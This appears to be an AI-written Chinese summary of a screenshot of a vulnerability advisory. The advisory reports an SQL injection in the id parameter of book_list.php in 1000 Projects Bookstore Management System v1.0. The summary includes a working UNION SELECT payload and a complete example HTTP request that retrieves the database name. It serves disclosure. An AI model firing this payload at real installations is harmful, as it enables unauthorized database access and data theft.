从这个网页截图中,可以获取到以下关于漏洞的关键信息: 1. 漏洞编号:#438146 2. 漏洞名称:1000 Projects Bookstore Management System v1.0 v1.0 SQL Injection 3. 漏洞描述: - 该漏洞被分类为严重,存在于Bookstore Management System的book_list.php文件中。 - SQL注入存在于id参数中。 - 该漏洞影响未知的部分。 4. 漏洞作者:孙一航 广州大学,樊琦 广州大学 5. 漏洞链接: - 原始链接:https://1000projects.org/bookstore-management-system-php-mysql-project.html - 漏洞文件:/bms/book_list.php?id= - 漏洞位置:/bms/book_list.php?id=, id 6. 数据库名:dbname=bms 7. payload: - GET请求:/bms/book_list.php?id=-17 union select 1,database(),3,4,5,6,7--&cat=Web Design // Leak place --> main_event_id 8. 漏洞利用: - 使用union select语句获取数据库信息。 - 通过GET请求发送payload。 9. 漏洞利用示例: - 请求头: - Host: 192.168.1.16 - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 - Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 - Accept-Encoding: gzip, deflate - DNT: 1 - Cookie: PHPSESSID=7hpghvc3ujgkqtdko38g42if7 - Connection: close - 请求参数: - id: -17 union select 1,database(),3,4,5,6,7--&cat=Web Design 这些信息可以帮助我们了解漏洞的详细情况,包括漏洞的类型、影响范围、利用方法等。